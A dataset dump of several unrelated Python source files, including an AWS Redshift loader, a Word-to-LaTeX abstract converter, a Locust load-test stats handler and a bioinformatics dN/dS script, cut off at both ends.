\"__main__\":\n # execute only if run as a script\n main()\n","sub_path":"ENCODE_target/classify_targets.py","file_name":"classify_targets.py","file_ext":"py","file_size_in_byte":8885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"464422829","text":"import json\nimport logging\n\nimport pg8000\n\nfrom awswrangler.exceptions import (\n RedshiftLoadError,\n UnsupportedType,\n InvalidDataframeType,\n)\n\nlogger = logging.getLogger(__name__)\n\n\nclass Redshift:\n def __init__(self, session):\n self._session = session\n\n @staticmethod\n def generate_connection(database, host, port, user, password):\n conn = pg8000.connect(\n database=database,\n host=host,\n port=int(port),\n user=user,\n password=password,\n ssl=False,\n )\n cursor = conn.cursor()\n cursor.execute(\"set statement_timeout = 1200000\")\n conn.commit()\n cursor.close()\n return conn\n\n def get_connection(self, glue_connection):\n conn_details = self._session.glue.get_connection_details(\n name=glue_connection)\n props = conn_details[\"ConnectionProperties\"]\n host = props[\"JDBC_CONNECTION_URL\"].split(\":\")[2].replace(\"/\", \"\")\n port, database = props[\"JDBC_CONNECTION_URL\"].split(\":\")[3].split(\"/\")\n user = props[\"USERNAME\"]\n password = props[\"PASSWORD\"]\n conn = self.generate_connection(database=database,\n host=host,\n port=int(port),\n user=user,\n password=password)\n return conn\n\n def write_load_manifest(self, manifest_path, objects_paths):\n objects_sizes = self._session.s3.get_objects_sizes(\n objects_paths=objects_paths)\n manifest = {\"entries\": []}\n for path, size in objects_sizes.items():\n entry = {\n \"url\": path,\n \"mandatory\": True,\n \"meta\": {\n \"content_length\": size\n }\n }\n manifest.get(\"entries\").append(entry)\n payload = json.dumps(manifest)\n client_s3 = self._session.boto3_session.client(\n service_name=\"s3\", config=self._session.botocore_config)\n bucket, path = manifest_path.replace(\"s3://\", \"\").split(\"/\", 1)\n client_s3.put_object(Body=payload, Bucket=bucket, Key=path)\n return manifest\n\n @staticmethod\n def get_number_of_slices(redshift_conn):\n cursor = redshift_conn.cursor()\n cursor.execute(\n \"SELECT COUNT(*) as count_slices FROM (SELECT DISTINCT node, slice from STV_SLICES)\"\n )\n count_slices = cursor.fetchall()[0][0]\n cursor.close()\n return count_slices\n\n @staticmethod\n def load_table(\n dataframe,\n dataframe_type,\n manifest_path,\n schema_name,\n table_name,\n redshift_conn,\n num_files,\n iam_role,\n mode=\"append\",\n preserve_index=False,\n ):\n cursor = redshift_conn.cursor()\n if mode == \"overwrite\":\n cursor.execute(\"-- AWS DATA WRANGLER\\n\"\n f\"DROP TABLE IF EXISTS {schema_name}.{table_name}\")\n schema = Redshift._get_redshift_schema(\n dataframe=dataframe,\n dataframe_type=dataframe_type,\n preserve_index=preserve_index,\n )\n cols_str = \"\".join([f\"{col[0]} {col[1]},\\n\" for col in schema])[:-2]\n sql = (\n \"-- AWS DATA WRANGLER\\n\"\n f\"CREATE TABLE IF NOT EXISTS {schema_name}.{table_name} (\\n{cols_str}\"\n \") DISTSTYLE AUTO\")\n cursor.execute(sql)\n sql = (\"-- AWS DATA WRANGLER\\n\"\n f\"COPY {schema_name}.{table_name} FROM '{manifest_path}'\\n\"\n f\"IAM_ROLE '{iam_role}'\\n\"\n \"MANIFEST\\n\"\n \"FORMAT AS PARQUET\")\n cursor.execute(sql)\n cursor.execute(\n \"-- AWS DATA WRANGLER\\n SELECT pg_last_copy_id() AS query_id\")\n query_id = cursor.fetchall()[0][0]\n sql = (\n \"-- AWS DATA WRANGLER\\n\"\n f\"SELECT COUNT(*) as num_files_loaded FROM STL_LOAD_COMMITS WHERE query = {query_id}\"\n )\n cursor.execute(sql)\n num_files_loaded = cursor.fetchall()[0][0]\n if num_files_loaded != num_files:\n redshift_conn.rollback()\n cursor.close()\n raise RedshiftLoadError(\n f\"Redshift load rollbacked. {num_files_loaded} files counted. {num_files} expected.\"\n )\n redshift_conn.commit()\n cursor.close()\n\n @staticmethod\n def _get_redshift_schema(dataframe, dataframe_type, preserve_index=False):\n schema_built = []\n if dataframe_type == \"pandas\":\n if preserve_index:\n name = str(\n dataframe.index.name) if dataframe.index.name else \"index\"\n dataframe.index.name = \"index\"\n dtype = str(dataframe.index.dtype)\n redshift_type = Redshift._type_pandas2redshift(dtype)\n schema_built.append((name, redshift_type))\n for col in dataframe.columns:\n name = str(col)\n dtype = str(dataframe[name].dtype)\n redshift_type = Redshift._type_pandas2redshift(dtype)\n schema_built.append((name, redshift_type))\n elif dataframe_type == \"spark\":\n for name, dtype in dataframe.dtypes:\n redshift_type = Redshift._type_spark2redshift(dtype)\n schema_built.append((name, redshift_type))\n else:\n raise InvalidDataframeType(dataframe_type)\n return schema_built\n\n @staticmethod\n def _type_pandas2redshift(dtype):\n dtype = dtype.lower()\n if dtype == \"int32\":\n return \"INTEGER\"\n elif dtype == \"int64\":\n return \"BIGINT\"\n elif dtype == \"float32\":\n return \"FLOAT4\"\n elif dtype == \"float64\":\n return \"FLOAT8\"\n elif dtype == \"bool\":\n return \"BOOLEAN\"\n elif dtype == \"object\" and isinstance(dtype, str):\n return \"VARCHAR(256)\"\n elif dtype[:10] == \"datetime64\":\n return \"TIMESTAMP\"\n else:\n raise UnsupportedType(\"Unsupported Pandas type: \" + dtype)\n\n @staticmethod\n def _type_spark2redshift(dtype):\n dtype = dtype.lower()\n if dtype == \"int\":\n return \"INTEGER\"\n elif dtype == \"long\":\n return \"BIGINT\"\n elif dtype == \"float\":\n return \"FLOAT8\"\n elif dtype == \"bool\":\n return \"BOOLEAN\"\n elif dtype == \"string\":\n return \"VARCHAR(256)\"\n elif dtype[:10] == \"datetime.datetime\":\n return \"TIMESTAMP\"\n else:\n raise UnsupportedType(\"Unsupported Spark type: \" + dtype)\n","sub_path":"awswrangler/redshift.py","file_name":"redshift.py","file_ext":"py","file_size_in_byte":6763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"130404636","text":"def max_rectangle_under_skyline(heights):\n\n pillars = []\n max_area = 0\n for i, h in enumerate(heights):\n while pillars and h <= heights[pillars[-1]]:\n height = heights[pillars.pop()]\n width = i - pillars[-1] -1 if pillars else i\n area = height * width\n max_area = max(area, max_area)\n pillars.append(i)\n return max_area\n","sub_path":"revise-daily/arjuna-vishwamitra-abhimanyu/epi/greedy-algorithms/2_compute_largest_rectangle_under_skyline.py","file_name":"2_compute_largest_rectangle_under_skyline.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"44359728","text":"# import libraries\nimport hashlib\n\n\nclass Miner:\n\n def mine(message, difficulty=1):\n assert difficulty >= 1\n prefix = '1' * difficulty\n for i in range(1000):\n digest = hashlib.sha256(str(hash(message)) + str(i))\n if digest.startswith(prefix):\n print(\"after \" + str(i) + \" iterations found nonce: \" + digest)\n return digest\n","sub_path":"Miners.py","file_name":"Miners.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"75060090","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\ndef p_times(statement, num):\n for i in range(num):\n print(statement)\n \np_times(\"Hello There\", 4)\n\n\n# In[2]:\n\n\ndef letter_count(string):\n dd = {}\n for letter in string:\n if letter in dd:\n dd[letter] += 1\n else:\n dd[letter] = 1\n print(dd)\n\nletter_count(\"Domingo\")\n\n\n# In[3]:\n\n\ncontacts = {\n 'Brian': '333-333-3333',\n 'Lenny': '444-444-4444',\n 'Daniel': '777-777-7777'\n}\n\ndef print_contacts(contact):\n for x, y in contacts.items():\n print(f\"{x} has a phone number of\", f\"{y}\")\n\nprint_contacts(contacts)\n\n\n# In[4]:\n\n\n\ndef multiply_by(arr, num):\n newList = []\n\n for numbers in arr: \n newList.append(numbers * num) \n print(newList)\n\nmultiply_by([1,2,3,4], 5)\n\n\n# In[5]:\n\n\nimport math\n\ndef factorial(n):\n return math.factorial(n) \n\nprint(factorial(5))\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"assignment.py","file_name":"assignment.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"420192711","text":"##################### Created by Wilson Zeng on April 27th, 2019 ##############################\r\n\r\nfrom bs4 import BeautifulSoup\r\nimport subprocess\r\nimport re\r\nimport os\r\n\r\n##################### Mutable Inputs: Can & Should be Updated as it Goes ######################\r\n\r\n# Available image extensions (mutable)\r\n# This code will find image files associated with the following extensions in the current\r\n# directory by matching the image file name against Lastname_Firstname.docx\r\n# !Important: Potential manual work before executing the script is fixing typos in people's\r\n# filenames. Apparently people misspell their own names nowadays.\r\nimage_ext = ['.png', '.jpg']\r\n\r\n# Extract file names in the current working directory into tuple: (file_name, extension)\r\nall_files = [os.path.splitext(f) for f in os.listdir('.') if os.path.isfile(f)]\r\ndoc_files = [file_tuple for file_tuple in all_files if '.docx' in file_tuple[1]]\r\nfig_files = [file_tuple for file_tuple in all_files if file_tuple[1] in image_ext]\r\n\r\n# Sorted by submitters' last names alphabetically\r\ndoc_files = sorted(doc_files, key=lambda x: x[0])\r\n\r\n# Code output will be written to output_tex\r\noutput_tex = 'output.tex'\r\n\r\n# Clear current output file if available\r\nlatex = open(output_tex, 'w')\r\nlatex.close()\r\n\r\n# Sanity Zone; please update as you go..\r\n# As far as I am aware, PANDOC processes '&' and '%' correctly.\r\n# Do not double-process them by adding to the dictionary special_characters!!\r\ngreek = {'α': r'$\\alpha$', 'β': r'$\\beta$', 'γ': r'$\\gamma$', 'δ': r'$\\delta$',\r\n 'ε': r'$\\epsilon$', 'ζ': r'$\\zeta$', 'η': r'$\\eta$', 'θ': r'$\\theta$',\r\n 'ι': r'$\\iota$', 'κ': r'$\\kappa$', 'λ': r'$\\lambda$', 'μ': r'$\\mu$',\r\n 'ν': r'$\\nu$', 'ξ': r'$\\xi$', 'π': r'$\\pi$', 'ρ': r'$\\rho$', 'σ': r'$\\sigma$',\r\n 'τ': r'$\\tau$', 'υ': r'$\\upsilon$', 'φ': r'$\\phi$', 'χ': r'$\\chi$', 'ψ': r'$\\psi$', 'ω': r'$\\omega$'}\r\nlatin_with_accents = {'é': r'\\'{e}', 'è': r'\\`{e}', 'ü': r'\\\"{u}', 'ä': r'\\\"{a}', 'ö': r'\\\"{o}'}\r\n\r\n# The symbol I know PANDOC does not handle properly\r\nfix_pandoc = {r'\\textasciitilde{}': '$/sim$' # PANDOC gives '\\textasciitilde{}' for tilde, bit it ends up being the tilde that is too high up\r\n }\r\n# PANDOC handles most special characters already, except \"~\", which is addressed in fix_pandoc (2019-04-28)\r\n# If there are any other special characters PANDOC didn't parse, might want to add it to special_characters.\r\n# For the ones which PANDOC process into something not desired, might want to add it to fix_pandoc instead.\r\nspecial_characters = {}\r\n\r\n# Pool all fixes together. These fixes will be applied after we have allowed PANDOC to do its job (i.e. To clean up what PANDOC did not do a great job in).\r\nminor_fixes = {**greek, **latin_with_accents, **fix_pandoc, **special_characters} \r\n\r\n# Name segments that should not be capitalized\r\n# Anything else? Please update :)\r\ndo_not_capitalize = ['van', 'der', 'van\\'t']\r\n\r\n################################## Functions! Functions! ######################################\r\n# General conversion of text extracted from html into latex format\r\n# First let PANDOC handles the dirty work\r\n# Then apply our specific fixes\r\n# text: str, the text to be converted\r\n# Returns: str, the input text in latex format\r\ndef textfix(text):\r\n #return text\r\n if '\\n' in text:\r\n paragraphs = text.split('\\n')\r\n else:\r\n paragraphs = [text]\r\n fixed_paragraphs = []\r\n for p in paragraphs:\r\n s = subprocess.run(['pandoc', '-f', 'html', '-t', 'latex'], input=p, stdout=subprocess.PIPE, universal_newlines=True)\r\n fixed_text = s.stdout[:-1]\r\n for fix in minor_fixes.keys():\r\n fixed_text = fixed_text.replace(fix, minor_fixes[fix])\r\n fixed_text = ' '*(len(p)-len(p.lstrip())) + fixed_text + ' '*(len(p)-len(p.rstrip())) #Side effect of pandoc is that it strips off the leading/trailing white spaces\r\n fixed_text = fixed_text.replace('\\n', ' ')\r\n fixed_paragraphs.append(fixed_text)\r\n total_fixed_text = r'\\\\'.join(fixed_paragraphs)\r\n return total_fixed_text\r\n\r\n# Function to be called to write the beginning & end of the main abstract latex environment\r\ndef choose_template(references=False, figure=False):\r\n if not references or figure:\r\n return {'begin': r'\\begin{posterabs}', 'end': r'\\end{posterabs}'}\r\n if not references:\r\n return {'begin': r'\\begin{posterabswfig}', 'end': r'\\end{posterabswfig}'}\r\n if not figure:\r\n return {'begin': r'\\begin{posterabswref}', 'end': r'\\end{posterabswref}'}\r\n return {'begin': r'\\begin{posterabswrefwfig}', 'end': r'\\end{posterabswrefwfig}'}\r\n\r\n# Function to be called to write abstract tile in latex\r\ndef proc_title(title=''):\r\n return '{'+title+'}'\r\n\r\n# Function to be called to process an author's information (variable 'author')\r\n# An author information is a tuple: (presenting, First_name, ..., Last_name)\r\n# If the author is the presenting author, presenting == True, and vice versa\r\n# Returns the name string of the author separated by spaces, as well as whether the author is presenting\r\ndef proc_author_info(author):\r\n presenting = author[0]\r\n name_components = []\r\n for name in author[1:]:\r\n if name in do_not_capitalize:\r\n name_components.append(textfix(name))\r\n else:\r\n name_components.append(textfix(name.capitalize()))\r\n if presenting:\r\n return {'name': r'\\underline{'+' '.join(name_components)+'}', 'presenting?': presenting}\r\n return {'name': ' '.join(name_components), 'presenting?': presenting}\r\n\r\n# Function to be called to process a list of authors' information and the corresponding affiliation numbers\r\n# authors are a list of author information tuples; affiliations are a list of lists of corresponding affiliation numbers (as strings of integers)\r\n# Returns: 1. str, the list of authors with annotated affiliations in latex format; 2. presenting_author's label string in the format: LastF\r\ndef proc_authors(authors, affiliations):\r\n author_tex = []\r\n label = ''\r\n for author, assoc_affil in zip(authors, affiliations):\r\n author_string = proc_author_info(author)['name']+',$^{'+','.join(assoc_affil)+'}$'\r\n author_tex.append(author_string)\r\n if proc_author_info(author)['presenting?']:\r\n label = author[-1].capitalize() + author[1][0].capitalize()\r\n author_tex_string = '{'+' '.join(author_tex)+'}'\r\n return {'tex': author_tex_string, 'label': label}\r\n\r\n# Function to be called to produce affiliations in latex format\r\ndef proc_affil(affil_info):\r\n affiliation_texts = ['{']\r\n for n in sorted(list(affil_info.keys())):\r\n if n == max(list(affil_info.keys())):\r\n affiliation_texts.append('$^'+str(n)+'$'+textfix(affil_info[n]))\r\n else:\r\n affiliation_texts.append('$^'+str(n)+'$'+textfix(affil_info[n])+r'\\\\')\r\n affiliation_texts.append('}')\r\n return affiliation_texts\r\n\r\n# Function to be called to write poster number in latex format\r\ndef proc_poster_num(poster_number='#'):\r\n return r'{P\\#}'\r\n\r\n# Function to be called to write lines indicating inserting figure in latex format\r\n# width and height are in number of pixels\r\ndef proc_fig(fig_file, width, height):\r\n fig_texts = ['{'+fig_file+'}']\r\n fig_texts.append('{'+str(width/100)+'}')\r\n fig_texts.append('{'+str(height/100)+'}')\r\n return fig_texts\r\n\r\n# Function to be called to produce references in latex format\r\ndef proc_ref(ref_info):\r\n reference_texts = ['{']\r\n for n in sorted(list(ref_info.keys())):\r\n if n == max(list(ref_info.keys())):\r\n reference_texts.append('{['+str(n)+']} '+ref_info[n])\r\n else:\r\n reference_texts.append('{['+str(n)+']} '+ref_info[n]+r'\\\\')\r\n reference_texts.append('}')\r\n return reference_texts\r\n\r\n# Function to be called to write the latex file output\r\ndef write_latex(output_name, title, authors, associated_affiliations, affiliations_list, abstract_text, figure='', width=0, height=0, references=[]):\r\n if output_name[-4:] != '.tex' and '.' not in output_name:\r\n output_name += '.tex'\r\n ref_avail = len(references) > 0\r\n fig_avail = len(figure) > 0\r\n\r\n latex = open(output_name, 'a')\r\n def write_line(line=''):\r\n latex.write(line+'\\n')\r\n return\r\n write_line(choose_template(ref_avail, fig_avail)['begin'])\r\n write_line(proc_title(title))\r\n write_line(proc_authors(authors, associated_affiliations)['tex'])\r\n for affil in proc_affil(affiliations_list):\r\n write_line(affil)\r\n write_line(proc_poster_num())\r\n if ref_avail:\r\n for ref in proc_ref(references):\r\n write_line(ref)\r\n if fig_avail:\r\n for l in proc_fig(figure, width, height):\r\n write_line(l)\r\n write_line(abstract_text)\r\n \r\n presenter_label = proc_authors(authors, associated_affiliations)['label']\r\n\r\n #Some people forget to indicate presenting author...\r\n if len(presenter_label) == 0:\r\n #Assume filename is the presenter\r\n file_id[0].split('_')\r\n presenter_label = file_id[0].split('_')[0].capitalize() + file_id[0].split('_')[1].capitalize()[0]\r\n\r\n write_line(r'\\label'+'{'+presenter_label+'}')\r\n write_line(choose_template(ref_avail, fig_avail)['end'])\r\n\r\n presenting_author = [author[1:] for author in authors if author[0]]\r\n #Some people forget to indicate presenting author...\r\n if len(presenting_author) == 0:\r\n presenting_author = [tuple(file_id[0].split('_'))]\r\n\r\n presenting_author = [name.capitalize() for name in presenting_author[0] if name not in do_not_capitalize]\r\n presenting_name_components = []\r\n for name in presenting_author:\r\n if name in do_not_capitalize:\r\n presenting_name_components.append(name)\r\n else:\r\n presenting_name_components.append(name.capitalize())\r\n presenting_author = ' '.join(presenting_name_components)\r\n\r\n phantom = r'\\phantomsection\\addcontentsline{toc}{subsection}{\\hyperref['+presenter_label+']'+r'{\\textbf{'+presenting_author+'}'+r'\\\\'+proc_title(title)[1:-1]+'}'+'}'\r\n write_line(phantom)\r\n write_line()\r\n latex.close()\r\n return\r\n\r\n# docx to html by PANDOC. The way the subprocess.run() is written in this code requires this python code to be run under Unix Shell, such as Bash.\r\nfor file_id in doc_files:\r\n ##################### Part I. Parsing Word File into HTML #####################\r\n input_doc = ''.join(file_id)\r\n print('Currently working on '+input_doc)\r\n html_name = file_id[0]+'.html'\r\n subprocess.run(['pandoc', input_doc, '-f', 'docx', '-t', 'html', '-o', html_name])\r\n\r\n # Look whether submitter submitted a figure file\r\n matching_figures = [''.join(fig_id) for fig_id in fig_files if fig_id[0].lower() == file_id[0].lower()]\r\n if len(matching_figures) > 0:\r\n fig_name = matching_figures[0]\r\n else:\r\n fig_name = ''\r\n if len(fig_name) > 0:\r\n print('Submitter has a figure: '+fig_name+'\\n')\r\n\r\n # Parse html file into BeautifulSoup :) for ease of extracting contents\r\n # See https://www.crummy.com/software/BeautifulSoup/bs4/doc/ for Beautiful Soup docs :)\r\n f = open(html_name, 'r')\r\n soup = BeautifulSoup(f, 'html.parser')\r\n\r\n # Extract all table/cell contents into a list of table objects\r\n all_tables = soup.find_all('table')\r\n\r\n # If someone messed up the document so badly/did not use the submission template\r\n if len(all_tables) == 0:\r\n print(input_doc+' is problematic. No tables were found. Please check the docx file manually as the submitter likely did not use the provided abstract template.\\n')\r\n continue\r\n\r\n # The first table has the abstract title (supposedly..)\r\n abstract_title_components = [textfix(str(c)) for c in all_tables[0].find_all(['th', 'td'])[0].contents]\r\n abstract_title = ''.join(abstract_title_components) ###Processed abstract title in latex format!\r\n\r\n # The second table has the the authors & affiliations (supposedly..)\r\n # Extract all fields ('tr') in the authors & affiliations table\r\n author_and_affil_fields = all_tables[1].find_all('tr')\r\n author_list = []\r\n associated_affil = []\r\n for entry in author_and_affil_fields[1:]:\r\n num_author = int(re.sub('[^0-9]', '', entry.find_all('td')[0].text))\r\n author_name = entry.find_all('td')[1].text\r\n # If no author in this line, skip over\r\n if len(author_name) == 0:\r\n continue\r\n author_name = author_name.split(' ')\r\n presenting = len(entry.find_all('td')[1].find_all('em')) > 0\r\n author_affil = [a for a in re.sub('[^0-9]', ' ', entry.find_all('td')[2].text).split(' ') if a != '']\r\n author_info = tuple([presenting] + author_name)\r\n author_list.append(author_info)\r\n associated_affil.append(author_affil)\r\n # The format of the author_list and associated_affil: author informations are tuples: tuple(presenting?, from first name to last name); affiliations are lists of corresponding affiliation numbers as strings (not integers).\r\n\r\n # The third table has the affiliation names\r\n # Extract all fields ('tr') in the affiliations\r\n affiliation_fields = all_tables[2].find_all('tr')\r\n affil_dict = {}\r\n for entry in affiliation_fields:\r\n affil_num = int(re.sub('[^0-9]', '', entry.find_all(['td', 'th'])[0].text))\r\n affil = entry.find_all(['td', 'th'])[1]\r\n if affil.p != None:\r\n affil = affil.p.text\r\n else:\r\n affil = affil.text\r\n if len(affil) > 0:\r\n affil_dict[affil_num] = affil\r\n\r\n # The fourth table has the abstract body text\r\n abstract_content = [textfix(str(c)) for c in all_tables[3].find_all(['th', 'td'])[0].contents]\r\n abstract_main = ''.join(abstract_content) ###Processed abstract text in latex format!\r\n\r\n # The fifth table has the references\r\n # Extract all fields ('tr') in the references\r\n\r\n if len(all_tables) > 4: #People who delete tables in the abstract template: I hate you. You are annoying!\r\n reference_fields = all_tables[4].find_all('tr')\r\n ref_list = {}\r\n for entry in reference_fields:\r\n ref_num = int(re.sub('[^0-9]', '', entry.find_all(['td', 'th'])[0].text))\r\n ref = entry.find_all(['td', 'th'])[1]\r\n fancy_texts = [str(x) for x in ref.find_all(['em', 'strong', 'sup'])]\r\n raw_ref_text = entry.find_all(['td', 'th'])[1]\r\n raw_ref_text = ''.join([textfix(str(c)) for c in raw_ref_text.contents])\r\n if len(raw_ref_text) > 0:\r\n ref_list[ref_num] = raw_ref_text\r\n\r\n f.close()\r\n\r\n ##################### Part II. Writing TEX File #####################\r\n write_latex(output_tex, abstract_title, author_list, associated_affil, affil_dict, abstract_main, figure=fig_name, width=0, height=0, references=ref_list)\r\n print('\\n')\r\n\r\n# Remove temporary html files\r\nhtml_files = [f for f in os.listdir('.') if os.path.isfile(f) and os.path.splitext(f)[1] == '.html']\r\nfor htm in html_files:\r\n os.remove(htm)","sub_path":"process_abstracts.py","file_name":"process_abstracts.py","file_ext":"py","file_size_in_byte":15124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"148311826","text":"\n\nfrom xai.brain.wordbase.nouns._idyll import _IDYLL\n\n#calss header\nclass _IDYLLS(_IDYLL, ):\n\tdef __init__(self,): \n\t\t_IDYLL.__init__(self)\n\t\tself.name = \"IDYLLS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"idyll\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_idylls.py","file_name":"_idylls.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"44444754","text":"from locust import events\nfrom datetime import datetime\nimport time\nimport sys\nimport requests\nimport os\n\n\ndef write_process_time_on_file(content, file_prefix):\n output_name = file_prefix + \"_process_time.txt\"\n file = open(output_name, \"w\")\n file.write(content.replace(\"
        \", \"\\n\"))\n\n file.close()\n\n\ndef send_stats_to_host(data, host):\n raw_data = \"\"\n for key in data.keys():\n raw_data += key + \"=\" + str(data[key]) + \" \"\n requests.post(host, data=raw_data)\n\n\ndef send_stats_to_local(data, file_prefix):\n output_name = file_prefix + \"_stats.log\"\n content = \"code \" + str(data[\"responseCode\"]) + \" | \" + \"time \" + data[\"responseTime\"] + \"\\n\"\n file = open(output_name, \"a\")\n file.write(content)\n\n file.close()\n\n\ndef send_stats(data, host, file_name_prefix):\n logger = os.environ[\"LOGGER\"]\n if logger == \"http\":\n send_stats_to_host(data, host)\n elif logger == \"local\":\n send_stats_to_local(data, file_name_prefix)\n\n\nclass EventHandler:\n\n def __init__(self):\n self.stats_host = \"http://88.147.126.145:8011\"\n self.current = 0\n self.stats_list = list()\n self.stats_list.append({\n \"start\": {\n \"time\": 0.0,\n \"utc\": None\n },\n \"end\": {\n \"time\": 0.0,\n \"utc\": None\n },\n \"diff\": 0.0,\n \"started\": False\n })\n self.output_file_prefix = \"\"\n self.set_output_file_prefix()\n\n def add_callback_to_event(self):\n events.request_success += self.on_request_success\n events.master_start_hatching += self.on_master_start_hatching\n events.master_stop_hatching += self.on_stop_hatching\n events.locust_stop_hatching += self.on_stop_hatching\n\n def reinit(self):\n stats = {\n \"start\": {\n \"time\": 0.0,\n \"utc\": None\n },\n \"end\": {\n \"time\": 0.0,\n \"utc\": None\n },\n \"diff\": 0.0,\n \"started\": False\n }\n self.stats_list.append(stats)\n\n def stats_to_string(self):\n content = \"\"\n\n for index, stats in enumerate(self.stats_list):\n content += \"PROCESS TIME: execution \" + str(index + 1) + \"

        \"\n content += \"Process started at: \" + str(stats[\"start\"][\"utc\"]) + \" (utc date)
        \"\n content += \"Process ended at: \" + str(stats[\"end\"][\"utc\"]) + \" (utc date)

        \"\n if stats[\"end\"][\"utc\"] is None and stats[\"start\"][\"utc\"] is not None:\n diff = time.time() - stats[\"start\"][\"time\"]\n content += \"Process in execution from: \" + str(round(diff, 2)) + \" seconds
        \"\n else:\n diff = stats[\"diff\"]\n content += \"Process execution time was: \" + str(round(diff, 2)) + \" seconds
        \"\n\n content += \"------------------------------------------------------------------------

        \"\n\n return content\n\n def starting(self):\n stats = self.stats_list[self.current]\n if stats[\"started\"] is False:\n stats[\"started\"] = True\n stats[\"start\"][\"time\"] = time.time()\n stats[\"start\"][\"utc\"] = datetime.utcnow()\n\n self.stats_list[self.current] = stats\n\n def stopping(self):\n stats = self.stats_list[self.current]\n stats[\"end\"][\"time\"] = time.time()\n stats[\"end\"][\"utc\"] = datetime.utcnow()\n stats[\"diff\"] = stats[\"end\"][\"time\"] - stats[\"start\"][\"time\"]\n\n self.stats_list[self.current] = stats\n\n write_process_time_on_file(self.stats_to_string(), self.output_file_prefix)\n\n self.current += 1\n\n self.reinit()\n\n def on_request_success(self, request_type, name, response_time, response_length):\n \"\"\"\n Event handler that get triggered on every successful request\n \"\"\"\n self.starting()\n send_stats({\n \"responseTime\": str(round(response_time, 1)),\n \"name\": \"locust\",\n \"responseCode\": 200\n }, self.stats_host, self.output_file_prefix)\n\n def on_request_failure(self, request_type, name, response_time, exception):\n \"\"\"\n Event handler that get triggered on every fiailure request\n \"\"\"\n send_stats({\n \"responseTime\": str(round(response_time, 1)),\n \"name\": \"locust\",\n \"responseCode\": 200\n }, self.stats_host, self.output_file_prefix)\n\n def on_master_start_hatching(self):\n \"\"\"\n Event handler that get triggered on initiate the hatching process on the master.\n \"\"\"\n self.starting()\n\n def on_stop_hatching(self):\n self.stopping()\n\n def set_output_file_prefix(self):\n argv = sys.argv[1:]\n for arg in argv:\n if \"--csv=\" in arg:\n self.output_file_prefix = arg.replace(\"--csv=\", \"\")\n","sub_path":"src/locust_files/event/event_handler.py","file_name":"event_handler.py","file_ext":"py","file_size_in_byte":4921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"221854838","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 27 14:53:21 2020\n\n@author: huang\n\"\"\"\n\n\ntotal=0\nfor num in range(1,101):\n total=total+num\nprint('1+2+3+...+100 =',total)\n\ni=0\ntotal=0\nwhile i < 1001:\n total=total+i\n i=i+1\n\nprint('1+2+3+...+1000 =',total)","sub_path":"Python/Example/1+2+3……+100.py","file_name":"1+2+3……+100.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"112674851","text":"# Copyright (c) 2019 Boocock James \n# Author: Boocock James \n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy of\n# this software and associated documentation files (the \"Software\"), to deal in\n# the Software without restriction, including without limitation the rights to\n# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of\n# the Software, and to permit persons to whom the Software is furnished to do so,\n# subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\n# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR\n# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER\n# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\n# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\nimport argparse\nfrom popgen_utils_bio2.analysis_functions_introgressions import get_dn_ds_from_alignment\nimport pyfasta\nfrom collections import OrderedDict\n\nimport os\n\ndef get_dn_ds_from_fasta(input_fasta, output_prefix):\n try:\n os.mkdir(output_prefix)\n except:\n pass\n fasta_in = pyfasta.Fasta(input_fasta)\n genes = list(fasta_in.keys())\n output_dn_ds = OrderedDict()\n no_genes = False\n if os.path.basename(input_fasta).startswith(\"N\"):\n if \"permissive\" in input_fasta:\n output_file = os.path.join(output_prefix, os.path.basename(input_fasta).split(\".permissive.fasta\")[0] + \".permissive.dn_ds\")\n else:\n output_file = os.path.join(output_prefix, os.path.basename(input_fasta).split(\".strict.fasta\")[0] + \".strict.dn_ds\")\n else:\n output_file = os.path.join(output_prefix, os.path.basename(input_fasta).split(\".fasta\")[0] + \".dn_ds\")\n if os.path.exists(output_file): \n with open(output_file) as out_f:\n for line in out_f:\n line_s = line.split(\"\\t\")\n last_gene = line_s[0]\n try:\n idx = genes.index(last_gene)\n except:\n no_genes = True\n idx=0\n else:\n # Do the whole thing\n idx = 0\n with open(output_file + \"_final\", \"w\") as out_f:\n if not no_genes:\n with open(output_file) as out_f_old:\n for line in out_f_old:\n gene = line.split(\"\\t\")[0]\n if gene != last_gene:\n out_f.write(line)\n for gene in genes[(idx):]:\n print(gene)\n out_ds = get_dn_ds_from_alignment(input_fasta,these_samples=[gene],do_window=True,gene_name=gene,cbs_reference=False,window=200,step=10, hoffman=True)\n if out_ds is not None:\n rows = out_ds \n 